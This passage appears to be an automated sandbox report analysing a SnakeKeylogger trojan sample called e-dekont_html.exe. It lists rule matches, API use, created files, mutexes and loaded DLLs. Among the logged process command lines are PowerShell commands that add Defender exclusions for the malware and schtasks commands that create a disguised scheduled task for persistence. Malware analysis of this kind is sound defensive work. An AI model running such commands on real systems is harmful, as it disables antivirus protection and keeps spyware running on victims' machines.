Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: e-dekont_html.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HvgRSvNGGXnNtV.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, CSBqd76FVHPD4GisL5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.e-dekont_html.exe.4204cf8.4.raw.unpack, iREnGfcZgH5xV715w4.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.e-dekont_html.exe.af70000.6.raw.unpack, CSBqd76FVHPD4GisL5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/15@3/3

Source: C:\Users\user\Desktop\e-dekont_html.exe

File created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Mutant created: \Sessions\1\BaseNamedObjects\pgwhiUFLTcntfcELHBXRLvhVk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:720:120:WilError_03

Source: C:\Users\user\Desktop\e-dekont_html.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE95B.tmp

Jump to behavior

Source: e-dekont_html.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: e-dekont_html.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\e-dekont_html.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002C01000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: e-dekont_html.exe	Virustotal: Detection: 52%
Source: e-dekont_html.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\e-dekont_html.exe

File read: C:\Users\user\Desktop\e-dekont_html.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Section loaded: uxtheme.dll	Jump to behavior
